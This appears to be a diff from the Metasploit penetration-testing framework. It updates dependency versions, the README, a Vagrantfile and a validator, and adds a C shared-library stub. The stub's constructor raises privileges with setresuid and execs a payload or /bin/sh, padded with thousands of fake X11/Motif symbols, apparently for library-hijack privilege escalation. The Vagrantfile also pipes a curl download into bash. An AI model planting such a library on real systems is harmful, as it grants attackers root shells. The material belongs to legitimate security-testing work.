-erubis, 2.7.0, MIT
+erubi, 1.9.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.0.2, MIT
-factory_bot_rails, 5.0.2, MIT
-faker, 1.9.4, MIT
-faraday, 0.15.4, MIT
+factory_bot, 6.1.0, MIT
+factory_bot_rails, 6.1.0, MIT
+faker, 2.13.0, MIT
+faraday, 1.0.1, MIT
+faye-websocket, 0.11.0, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
-i18n, 0.9.5, MIT
+i18n, 1.8.5, MIT
+io-console, 0.5.6, "Simplified BSD"
+irb, 1.2.4, "Simplified BSD"
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.2.3, MIT
+json, 2.3.1, ruby
+loofah, 2.6.0, MIT
+memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
-metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.34, "New BSD"
-metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
-method_source, 0.9.2, MIT
+metasploit-concern, 3.0.0, "New BSD"
+metasploit-credential, 4.0.2, "New BSD"
+metasploit-framework, 6.0.3, "New BSD"
+metasploit-model, 3.0.0, "New BSD"
+metasploit-payloads, 2.0.10, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 4.0.2, "New BSD"
+metasploit_payloads-mettle, 1.0.2, "3-clause (or ""modified"") BSD"
+method_source, 1.0.0, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.11.3, MIT
+minitest, 5.14.1, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.0, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
+mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.2.0, MIT
+net-ldap, 0.16.3, MIT
+net-ssh, 6.1.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.3, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.10, MIT
+octokit, 4.18.0, MIT
 openssl-ccm, 1.2.2, MIT
+openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
-pastel, 0.7.3, MIT
+parallel, 1.19.2, MIT
+parser, 2.7.1.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.0, MIT
-pg, 0.21.0, "New BSD"
-pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.1, MIT
-pry, 0.12.2, MIT
-public_suffix, 3.1.1, MIT
-rack, 1.6.11, MIT
-rack-protection, 1.5.5, MIT
-rack-test, 0.6.3, MIT
-rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11.1, MIT
-rake, 12.3.2, MIT
+pdf-reader, 2.4.0, MIT
+pg, 1.2.3, "Simplified BSD"
+pry, 0.13.1, MIT
+pry-byebug, 3.9.0, MIT
+public_suffix, 4.0.5, MIT
+rack, 2.2.3, MIT
+rack-protection, 2.0.8.1, MIT
+rack-test, 1.1.0, MIT
+rails-dom-testing, 2.0.3, MIT
+rails-html-sanitizer, 1.3.0, MIT
+railties, 5.2.4.3, MIT
+rainbow, 3.0.0, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.2, unknown
-redcarpet, 3.4.0, MIT
+recog, 2.3.14, unknown
+redcarpet, 3.5.0, MIT
+regexp_parser, 1.7.1, MIT
+reline, 0.1.4, "Ruby License"
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.24, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.18, "New BSD"
+rex-socket, 0.1.23, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.21, "New BSD"
+rex-text, 0.2.28, "New BSD"
 rex-zip, 0.1.3, "New BSD"
+rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.8.0, MIT
-rspec-core, 3.8.1, MIT
-rspec-expectations, 3.8.4, MIT
-rspec-mocks, 3.8.1, MIT
-rspec-rails, 3.8.2, MIT
+rspec, 3.9.0, MIT
+rspec-core, 3.9.2, MIT
+rspec-expectations, 3.9.2, MIT
+rspec-mocks, 3.9.1, MIT
+rspec-rails, 4.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.2, MIT
+rspec-support, 3.9.3, MIT
+rubocop, 0.89.1, MIT
+rubocop-ast, 0.3.0, MIT
 ruby-macho, 2.2.0, MIT
+ruby-prof, 1.4.1, "Simplified BSD"
+ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 1.1.0, "New BSD"
+ruby2_keywords, 0.0.2, ruby
+ruby_smb, 2.0.3, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.3, "Simplified BSD"
+rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.16.1, MIT
-simplecov-html, 0.10.2, MIT
-sinatra, 1.4.8, MIT
+simplecov, 0.18.2, MIT
+simplecov-html, 0.12.2, MIT
+simpleidn, 0.1.1, MIT
+sinatra, 2.0.8.1, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
-strings, 0.1.5, MIT
-strings-ansi, 0.1.0, MIT
-swagger-blocks, 2.0.2, MIT
+swagger-blocks, 3.0.0, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
-tilt, 2.0.9, MIT
+tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tty-color, 0.5.0, MIT
-tty-pager, 0.12.1, MIT
-tty-screen, 0.6.5, MIT
-tty-tree, 0.3.0, MIT
-tty-which, 0.4.1, MIT
-tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2019.1, MIT
-unicode-display_width, 1.6.0, MIT
-unicode_utils, 1.4.0, unknown
-warden, 1.2.7, MIT
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.7, MIT
+tzinfo-data, 1.2020.1, MIT
+unf, 0.1.4, "2-clause BSDL"
+unf_ext, 0.0.7.7, MIT
+unicode-display_width, 1.7.0, MIT
+warden, 1.2.8, MIT
+websocket-driver, 0.7.3, "Apache 2.0"
+websocket-extensions, 0.1.5, "Apache 2.0"
 windows_error, 0.1.2, BSD
-xdr, 2.0.0, "Apache 2.0"
+xdr, 3.0.1, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.19, MIT
+yard, 0.9.25, MIT
@@ -1,7 +1,7 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-COPYING for more details.
+[COPYING](COPYING) for more details.

 The latest version of this software is available from: https://metasploit.com

@@ -3,7 +3,7 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/xenial64"
+  config.vm.box = "ubuntu/bionic64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
@@ -0,0 +1,3 @@
+class ApplicationRecord < ActiveRecord::Base
+  self.abstract_class = true
+end
@@ -6,7 +6,7 @@ module Metasploit
    class FilePathValidator < ActiveModel::EachValidator

      def validate_each(record, attribute, value)
-        unless ::File.file? value
+        unless value && ::File.file?(value)
          record.errors[attribute] << (options[:message] || "is not a valid path to a regular file")
        end
      end
@@ -22,18 +22,6 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

-# Remove bigdecimal warning - start
-# https://github.com/ruby/bigdecimal/pull/115
-# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
-# TODO: remove when upgrading from rails 4.x
-require 'bigdecimal'
-
-def BigDecimal.new(*args, **kwargs)
-  return BigDecimal(*args) if kwargs.empty?
-  BigDecimal(*args, **kwargs)
-end
-# Remove bigdecimal warning - end
-
 begin
  require 'bundler/setup'
 rescue LoadError => e
@@ -0,0 +1,3643 @@
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <dlfcn.h>
+void __cxa_finalize (void *d) {
+    return;
+}
+void __attribute__((constructor)) init() {
+    setresuid(geteuid(), geteuid(), geteuid());
+    execl("#{payload_path}", (char *)NULL, (char *)NULL);
+    execl("/bin/sh", (char *)NULL, (char *)NULL);
+}
+int applicationShellClassRec = 0;
+int applicationShellWidgetClass = 0;
+int colorConvertArgs = 0;
+int compositeWidgetClass = 0;
+int constraintClassRec = 0;
+int constraintWidgetClass = 0;
+int coreWidgetClass = 0;
+int dump_external = 0;
+int dump_fontlist = 0;
+int dump_fontlist_cache = 0;
+int dump_internal = 0;
+int FcPatternAddInteger = 0;
+int FcPatternAddString = 0;
+int FcPatternCreate = 0;
+int FcPatternDestroy = 0;
+int GetWidgetNavigPtrs = 0;
+int InitializeScrollBars = 0;
+int _ITM_deregisterTMCloneTable = 0;
+int _ITM_registerTMCloneTable = 0;
+int jpeg_calc_output_dimensions = 0;
+int jpeg_CreateDecompress = 0;
+int jpeg_destroy_decompress = 0;
+int jpeg_finish_decompress = 0;
+int jpeg_read_header = 0;
+int jpeg_read_scanlines = 0;
+int jpeg_start_decompress = 0;
+int jpeg_std_error = 0;
+int jpeg_stdio_src = 0;
+int load_jpeg = 0;
+int localeconv = 0;
+int __longjmp_chk = 0;
+int nl_langinfo = 0;
+int NumLockMask = 0;
+int objectClass = 0;
+int objectClassRec = 0;
+int overrideShellClassRec = 0;
+int png_create_info_struct = 0;
+int png_create_read_struct = 0;
+int png_destroy_read_struct = 0;
+int png_get_channels = 0;
+int png_get_gAMA = 0;
+int png_get_IHDR = 0;
+int png_get_rowbytes = 0;
+int png_get_valid = 0;
+int png_init_io = 0;
+int png_read_end = 0;
+int png_read_image = 0;
+int png_read_info = 0;
+int png_read_update_info = 0;
+int png_set_expand = 0;
+int png_set_gamma = 0;
+int png_set_gray_to_rgb = 0;
+int png_set_longjmp_fn = 0;
+int png_set_sig_bytes = 0;
+int png_set_strip_16 = 0;
+int png_sig_cmp = 0;
+int rectObjClass = 0;
+int rectObjClassRec = 0;
+int ScrollLockMask = 0;
+int SetMwmStuff = 0;
+int T = 0;
+int topLevelShellWidgetClass = 0;
+int transientShellClassRec = 0;
+int transientShellWidgetClass = 0;
+int V = 0;
+int vendorShellClassRec = 0;
+int vendorShellWidgetClass = 0;
+int W = 0;
+int __wctomb_chk = 0;
+int widgetClass = 0;
+int widgetClassRec = 0;
+int wmShellClassRec = 0;
+int wmShellWidgetClass = 0;
+int XAddExtension = 0;
+int XAllocColor = 0;
+int XAllocColorCells = 0;
+int XAllowEvents = 0;
+int XBell = 0;
+int XChangeActivePointerGrab = 0;
+int XChangeGC = 0;
+int XChangeProperty = 0;
+int XChangeWindowAttributes = 0;
+int XCheckIfEvent = 0;
+int XCheckMaskEvent = 0;
+int XClearArea = 0;
+int XClearWindow = 0;
+int XCloseDisplay = 0;
+int XCloseIM = 0;
+int XConfigureWindow = 0;
+int XConvertSelection = 0;
+int XCopyArea = 0;
+int XCopyPlane = 0;
+int XCreateBitmapFromData = 0;
+int XCreateFontCursor = 0;
+int XCreateGC = 0;
+int XCreateIC = 0;
+int XCreateImage = 0;
+int XCreatePixmap = 0;
+int XCreatePixmapCursor = 0;
+int XCreatePixmapFromBitmapData = 0;
+int XCreateRegion = 0;
+int XCreateWindow = 0;
+int XDefaultColormap = 0;
+int XDefaultDepth = 0;
+int XDefaultScreen = 0;
+int XDefaultVisual = 0;
+int XDefineCursor = 0;
+int XDeleteContext = 0;
+int XDeleteProperty = 0;
+int XDestroyIC = 0;
+int XDestroyRegion = 0;
+int XDestroyWindow = 0;
+int XDisplayKeycodes = 0;
+int XDisplayOfScreen = 0;
+int XDisplayString = 0;
+int XDrawArc = 0;
+int XDrawImageString = 0;
+int XDrawImageString16 = 0;
+int XDrawLine = 0;
+int XDrawLines = 0;
+int XDrawPoint = 0;
+int XDrawRectangle = 0;
+int XDrawSegments = 0;
+int XDrawString = 0;
+int XDrawString16 = 0;
+int _XEditResGet16 = 0;
+int _XEditResGet32 = 0;
+int _XEditResGet8 = 0;
+int _XEditResGetSigned16 = 0;
+int _XEditResGetString8 = 0;
+int _XEditResGetWidgetInfo = 0;
+int _XEditResPut16 = 0;
+int _XEditResPut32 = 0;
+int _XEditResPut8 = 0;
+int _XEditResPutString8 = 0;
+int _XEditResPutWidgetInfo = 0;
+int _XEditResResetStream = 0;
+int XEmptyRegion = 0;
+int XEqualRegion = 0;
+int XESetCloseDisplay = 0;
+int XExtentsOfFontSet = 0;
+int XFetchBuffer = 0;
+int XFillArc = 0;
+int XFillPolygon = 0;
+int XFillRectangle = 0;
+int XFillRectangles = 0;
+int XFindContext = 0;
+int XFlush = 0;
+int XFontsOfFontSet = 0;
+int XFree = 0;
+int XFreeColors = 0;
+int XFreeCursor = 0;
+int XFreeFont = 0;
+int XFreeFontNames = 0;
+int XFreeGC = 0;
+int XFreeModifiermap = 0;
+int XFreePixmap = 0;
+int XFreeStringList = 0;
+int XftDrawCreate = 0;
+int XftDrawCreateBitmap = 0;
+int XftDrawDestroy = 0;
+int XftDrawRect = 0;
+int XftDrawSetClip = 0;
+int XftDrawSetClipRectangles = 0;
+int XftDrawString16 = 0;
+int XftDrawString32 = 0;
+int XftDrawStringUtf8 = 0;
+int XftFontClose = 0;
+int XftFontMatch = 0;
+int XftFontOpenPattern = 0;
+int XftTextExtents16 = 0;
+int XftTextExtents32 = 0;
+int XftTextExtents8 = 0;
+int XftTextExtentsUtf8 = 0;
+int XGetAtomName = 0;
+int XGetFontProperty = 0;
+int XGetGCValues = 0;
+int XGetGeometry = 0;
+int XGetICValues = 0;
+int XGetImage = 0;
+int XGetIMValues = 0;
+int XGetInputFocus = 0;
+int XGetKeyboardMapping = 0;
+int XGetModifierMapping = 0;
+int XGetOCValues = 0;
+int XGetOMValues = 0;
+int XGetSelectionOwner = 0;
+int XGetWindowAttributes = 0;
+int XGetWindowProperty = 0;
+int XGetWMColormapWindows = 0;
+int XGrabKeyboard = 0;
+int XGrabPointer = 0;
+int XGrabServer = 0;
+int XHeightOfScreen = 0;
+int xiColumnConstraintExtension = 0;
+int XiCreateStippledPixmap = 0;
+int _XiGetTabIndex = 0;
+int XIMOfIC = 0;
+int XInstallColormap = 0;
+int XInternAtom = 0;
+int XInternAtoms = 0;
+int XIntersectRegion = 0;
+int XiReleaseStippledPixmap = 0;
+int _XiResolveAllPartOffsets = 0;
+int XiResolveAllPartOffsets = 0;
+int XKeysymToKeycode = 0;
+int XKeysymToString = 0;
+int XLastKnownRequestProcessed = 0;
+int XListFonts = 0;
+int XListInstalledColormaps = 0;
+int XLoadQueryFont = 0;
+int XLookupString = 0;
+int Xm18IListUnselectAllItems = 0;
+int Xm18IListUnselectItem = 0;
+int _XmAccessColorData = 0;
+int XmActivateProtocol = 0;
+int _XmAddCallback = 0;
+int _XmAddGrab = 0;
+int _XmAddHashEntry = 0;
+int XmAddProtocolCallback = 0;
+int XmAddProtocols = 0;
+int _Xm_AddQueue = 0;
+int XmAddTabGroup = 0;
+int _XmAddTearOffEventHandlers = 0;
+int _XmAddToColorCache = 0;
+int XmAddToPostFromList = 0;
+int _XmAllocHashTable = 0;
+int _XmAllocMotifAtom = 0;
+int _XmAllocReceiverInfo = 0;
+int _XmAllocScratchPixmap = 0;
+int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
+int XMapRaised = 0;
+int XMapWindow = 0;
+int _XmArrowB_defaultTranslations = 0;
+int xmArrowButtonClassRec = 0;
+int xmArrowButtonGadgetClass = 0;
+int xmArrowButtonGadgetClassRec = 0;
+int xmArrowButtonWidgetClass = 0;
+int _XmArrowPixmapCacheCompare = 0;
+int _XmArrowPixmapCacheDelete = 0;
+int _XmAssignInsensitiveColor = 0;
+int _XmAssignLabG_MarginBottom = 0;
+int _XmAssignLabG_MarginHeight = 0;
+int _XmAssignLabG_MarginLeft = 0;
+int _XmAssignLabG_MarginRight = 0;
+int _XmAssignLabG_MarginTop = 0;
+int _XmAssignLabG_MarginWidth = 0;
+int XMaxRequestSize = 0;
+int _XmBackgroundColorDefault = 0;
+int _XmBaseClassPartInitialize = 0;
+int _XmBB_CreateButtonG = 0;
+int _XmBB_CreateLabelG = 0;
+int _XmBB_GetDialogTitle = 0;
+int _XmBBUpdateDynDefaultButton = 0;
+int XmbDrawImageString = 0;
+int XmbDrawString = 0;
+int _XmBlackPixel = 0;
+int XmbLookupString = 0;
+int _XmBottomShadowColorDefault = 0;
+int XmbResetIC = 0;
+int XmbTextEscapement = 0;
+int XmbTextExtents = 0;
+int XmbTextListToTextProperty = 0;
+int XmbTextPropertyToTextList = 0;
+int _XmBuildExtResources = 0;
+int _XmBuildGadgetResources = 0;
+int _XmBuildManagerResources = 0;
+int _XmBuildPrimitiveResources = 0;
+int _XmBuildResources = 0;
+int _XmBulletinB_defaultTranslations = 0;
+int _XmBulletinBoardCancel = 0;
+int xmBulletinBoardClassRec = 0;
+int _XmBulletinBoardFocusMoved = 0;
+int _XmBulletinBoardMap = 0;
+int _XmBulletinBoardReturn = 0;
+int _XmBulletinBoardSetDefaultShadow = 0;
+int _XmBulletinBoardSetDynDefaultButton = 0;
+int _XmBulletinBoardSizeUpdate = 0;
+int xmBulletinBoardWidgetClass = 0;
+int xmButtonBoxClassRec = 0;
+int xmButtonBoxWidgetClass = 0;
+int _XmButtonPopdownChildren = 0;
+int _XmButtonTakeFocus = 0;
+int _XmByteOrderChar = 0;
+int _XmCacheCopy = 0;
+int _XmCacheDelete = 0;
+int _XmCachePart = 0;
+int _XmCachePixmap = 0;
+int _XmCalcLabelDimensions = 0;
+int _XmCalcLabelGDimensions = 0;
+int _XmCallCallbackList = 0;
+int _XmCallFocusMoved = 0;
+int _XmCallRowColumnMapCallback = 0;
+int _XmCallRowColumnUnmapCallback = 0;
+int _XmCascadeB_menubar_events = 0;
+int _XmCascadeB_p_events = 0;
+int _XmCascadeBPrimClassExtRec = 0;
+int xmCascadeButtonClassRec = 0;
+int xmCascadeButtonGadgetClass = 0;
+int xmCascadeButtonGadgetClassRec = 0;
+int XmCascadeButtonGadgetHighlight = 0;
+int xmCascadeButtonGCacheObjClassRec = 0;
+int XmCascadeButtonHighlight = 0;
+int xmCascadeButtonWidgetClass = 0;
+int _XmCascadingPopup = 0;
+int _XmCBHelp = 0;
+int _XmCBNameActivate = 0;
+int _XmCBNameValueChanged = 0;
+int XmChangeColor = 0;
+int _XmChangeHSB = 0;
+int _XmChangeNavigationType = 0;
+int _XmChangeVSB = 0;
+int _XmCharsetCanonicalize = 0;
+int _XmCleanPixmapCache = 0;
+int _XmClearBCompatibility = 0;
+int _XmClearBGCompatibility = 0;
+int _XmClearBGPixmapName = 0;
+int _XmClearBorder = 0;
+int _XmClearDisplayTables = 0;
+int _XmClearDragReceiverInfo = 0;
+int _XmClearFocusPath = 0;
+int _XmClearIconPixmapName = 0;
+int _XmClearKbdFocus = 0;
+int _XmClearRect = 0;
+int _XmClearShadowType = 0;
+int _XmClearTabGroup = 0;
+int _XmClearTraversal = 0;
+int XmClipboardBeginCopy = 0;
+int XmClipboardCancelCopy = 0;
+int XmClipboardCopy = 0;
+int XmClipboardCopyByName = 0;
+int XmClipboardEndCopy = 0;
+int XmClipboardEndRetrieve = 0;
+int XmClipboardInquireCount = 0;
+int XmClipboardInquireFormat = 0;
+int XmClipboardInquireLength = 0;
+int XmClipboardInquirePendingItems = 0;
+int XmClipboardLock = 0;
+int _XmClipboardPassType = 0;
+int XmClipboardRegisterFormat = 0;
+int XmClipboardRetrieve = 0;
+int XmClipboardStartCopy = 0;
+int XmClipboardStartRetrieve = 0;
+int XmClipboardUndoCopy = 0;
+int XmClipboardUnlock = 0;
+int XmClipboardWithdrawFormat = 0;
+int xmClipWindowClassRec = 0;
+int _XmClipWindowTranslationTable = 0;
+int xmClipWindowWidgetClass = 0;
+int _XmColorObjCache = 0;
+int _XmColorObjCacheDisplay = 0;
+int xmColorObjClass = 0;
+int xmColorObjClassRec = 0;
+int _XmColorObjCreate = 0;
+int xmColorSelectorClassRec = 0;
+int xmColorSelectorWidgetClass = 0;
+int xmColumnClassRec = 0;
+int xmColumnWidgetClass = 0;
+int xmCombinationBox2ClassRec = 0;
+int XmCombinationBox2GetArrow = 0;
+int XmCombinationBox2GetChild = 0;
+int XmCombinationBox2GetLabel = 0;
+int XmCombinationBox2GetList = 0;
+int XmCombinationBox2GetText = 0;
+int XmCombinationBox2GetValue = 0;
+int xmCombinationBox2WidgetClass = 0;
+int XmCombinationBoxGetValue = 0;
+int XmComboBoxAddItem = 0;
+int xmComboBoxClassRec = 0;
+int _XmComboBox_defaultAccelerators = 0;
+int _XmComboBox_defaultTranslations = 0;
+int XmComboBoxDeletePos = 0;
+int _XmComboBox_dropDownComboBoxAccelerators = 0;
+int _XmComboBox_dropDownListTranslations = 0;
+int XmComboBoxSelectItem = 0;
+int XmComboBoxSetItem = 0;
+int _XmComboBox_textFocusTranslations = 0;
+int XmComboBoxUpdate = 0;
+int xmComboBoxWidgetClass = 0;
+int XmCommandAppendValue = 0;
+int xmCommandClassRec = 0;
+int XmCommandError = 0;
+int XmCommandGetChild = 0;
+int _XmCommandReturn = 0;
+int XmCommandSetValue = 0;
+int _XmCommandUpOrDown = 0;
+int xmCommandWidgetClass = 0;
+int XmCompareISOLatin1 = 0;
+int XmCompareXtWidgetGeometry = 0;
+int XmCompareXtWidgetGeometryToWidget = 0;
+int _XmComputeVisibilityRect = 0;
+int _XmConfigureObject = 0;
+int _XmConfigureWidget = 0;
+int xmContainerClassRec = 0;
+int XmContainerCopy = 0;
+int XmContainerCopyLink = 0;
+int XmContainerCut = 0;
+int _XmContainer_defaultTranslations = 0;
+int XmContainerGetItemChildren = 0;
+int XmContainerPaste = 0;
+int XmContainerPasteLink = 0;
+int XmContainerRelayout = 0;
+int XmContainerReorder = 0;
+int _XmContainer_traversalTranslations = 0;
+int xmContainerWidgetClass = 0;
+int _XmConvertActionParamToRepTypeId = 0;
+int _XmConvertComplete = 0;
+int _XmConvertCSToString = 0;
+int _XmConvertFactor = 0;
+int _XmConvertFloatUnitsToIntUnits = 0;
+int _XmConvertHandler = 0;
+int _XmConvertHandlerSetLocal = 0;
+int _XmConvertStringToUnits = 0;
+int XmConvertStringToUnits = 0;
+int _XmConvertToBW = 0;
+int _XmConvertUnits = 0;
+int XmConvertUnits = 0;
+int _XmCopyCursorIconQuark = 0;
+int XmCopyISOLatin1Lowered = 0;
+int _XmCountVaList = 0;
+int XmCreateArrowButton = 0;
+int XmCreateArrowButtonGadget = 0;
+int _XmCreateArrowPixmaps = 0;
+int XmCreateBulletinBoard = 0;
+int XmCreateBulletinBoardDialog = 0;
+int XmCreateButtonBox = 0;
+int XmCreateCascadeButton = 0;
+int XmCreateCascadeButtonGadget = 0;
+int XmCreateColorSelector = 0;
+int XmCreateColumn = 0;
+int XmCreateCombinationBox2 = 0;
+int XmCreateComboBox = 0;
+int XmCreateCommand = 0;
+int XmCreateCommandDialog = 0;
+int XmCreateContainer = 0;
+int XmCreateDataField = 0;
+int XmCreateDialogShell = 0;
+int XmCreateDragIcon = 0;
+int XmCreateDrawingArea = 0;
+int XmCreateDrawnButton = 0;
+int XmCreateDropDown = 0;
+int XmCreateDropDownComboBox = 0;
+int XmCreateDropDownList = 0;
+int XmCreateErrorDialog = 0;
+int XmCreateExt18List = 0;
+int XmCreateExtended18List = 0;
+int XmCreateFileSelectionBox = 0;
+int XmCreateFileSelectionDialog = 0;
+int _XmCreateFocusData = 0;
+int XmCreateFontSelector = 0;
+int XmCreateForm = 0;
+int XmCreateFormDialog = 0;
+int XmCreateFrame = 0;
+int XmCreateGrabShell = 0;
+int XmCreateIconBox = 0;
+int XmCreateIconButton = 0;
+int XmCreateIconGadget = 0;
+int XmCreateIconHeader = 0;
+int XmCreateInformationDialog = 0;
+int XmCreateLabel = 0;
+int XmCreateLabelGadget = 0;
+int XmCreateList = 0;
+int XmCreateMainWindow = 0;
+int XmCreateMenuBar = 0;
+int _XmCreateMenuCursor = 0;
+int XmCreateMenuShell = 0;
+int XmCreateMessageBox = 0;
+int XmCreateMessageDialog = 0;
+int XmCreateMultiList = 0;
+int XmCreateNotebook = 0;
+int XmCreateOptionMenu = 0;
+int XmCreateOutline = 0;
+int XmCreatePaned = 0;
+int XmCreatePanedWindow = 0;
+int XmCreatePopupMenu = 0;
+int XmCreatePromptDialog = 0;
+int XmCreatePulldownMenu = 0;
+int XmCreatePushButton = 0;
+int XmCreatePushButtonGadget = 0;
+int XmCreateQuestionDialog = 0;
+int XmCreateRadioBox = 0;
+int _XmCreateRenderTable = 0;
+int _XmCreateRendition = 0;
+int XmCreateRowColumn = 0;
+int XmCreateScale = 0;
+int XmCreateScrollBar = 0;
+int XmCreateScrolledList = 0;
+int XmCreateScrolledText = 0;
+int XmCreateScrolledWindow = 0;
+int XmCreateSelectionBox = 0;
+int XmCreateSelectionDialog = 0;
+int XmCreateSeparator = 0;
+int XmCreateSeparatorGadget = 0;
+int XmCreateSimpleCheckBox = 0;
+int XmCreateSimpleMenuBar = 0;
+int XmCreateSimpleOptionMenu = 0;
+int XmCreateSimplePopupMenu = 0;
+int XmCreateSimplePulldownMenu = 0;
+int XmCreateSimpleRadioBox = 0;
+int XmCreateSimpleSpinBox = 0;
+int XmCreateSpinBox = 0;
+int _XmCreateTab = 0;
+int XmCreateTabBox = 0;
+int _XmCreateTabList = 0;
+int XmCreateTabStack = 0;
+int XmCreateTemplateDialog = 0;
+int XmCreateText = 0;
+int XmCreateTextField = 0;
+int XmCreateToggleButton = 0;
+int XmCreateToggleButtonGadget = 0;
+int XmCreateTree = 0;
+int _XmCreateVisibilityRect = 0;
+int XmCreateWarningDialog = 0;
+int XmCreateWorkArea = 0;
+int XmCreateWorkingDialog = 0;
+int XmCvtByteStreamToXmString = 0;
+int XmCvtCTToXmString = 0;
+int XmCvtFromHorizontalPixels = 0;
+int XmCvtFromVerticalPixels = 0;
+int XmCvtStringToUnitType = 0;
+int XmCvtTextPropertyToXmStringTable = 0;
+int XmCvtTextToXmString = 0;
+int XmCvtToHorizontalPixels = 0;
+int XmCvtToVerticalPixels = 0;
+int XmCvtXmStringTableToTextProperty = 0;
+int XmCvtXmStringToByteStream = 0;
+int _XmCvtXmStringToCT = 0;
+int XmCvtXmStringToCT = 0;
+int XmCvtXmStringToText = 0;
+int _XmCvtXmStringToUTF8String = 0;
+int XmCvtXmStringToUTF8String = 0;
+int _XmDataF_EventBindings1 = 0;
+int _XmDataF_EventBindings2 = 0;
+int _XmDataF_EventBindings3 = 0;
+int _XmDataF_EventBindings4 = 0;
+int xmDataFieldClassRec = 0;
